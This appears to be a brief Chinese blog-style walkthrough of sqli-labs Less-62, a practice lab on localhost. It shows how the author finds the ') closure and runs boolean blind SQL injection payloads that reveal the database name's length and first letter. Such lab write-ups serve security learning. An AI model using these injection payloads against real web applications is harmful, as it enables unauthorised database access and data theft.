sqli-labs (less-62)
进入62关,输入
http://127.0.0.1/sql1/Less-62/?id=1
竟然发现会有130次机会,这里我们可以大胆猜想这里因为是Boolean盲注了,那么到底是不是呢,我们输入
http://127.0.0.1/sql1/Less-62/?id=1'
没有任何错误回显,这里我也尝试了union注入,但是显然也是不行的,所以我们只有使用Boolean盲注了
http://127.0.0.1/sql1/Less-62/?id=1'--+ #回显错误
http://127.0.0.1/sql1/Less-62/?id=1')--+ #回显正常
所以判断闭合方式为’)–+,并且为字符型注入
判断当前库长度
http://127.0.0.1/sql1/Less-62/?id=1') and length(database())=10--+
所以当前数据库长度为10
判断当前数据库的第一个字母
http://127.0.0.1/sql1/Less-62/?id=1') and substr(database(),1,1)='c'--+
所以当前数据库的第一个字母为c
接下来的步骤这里我就不详细介绍,具体过程请看我的less-5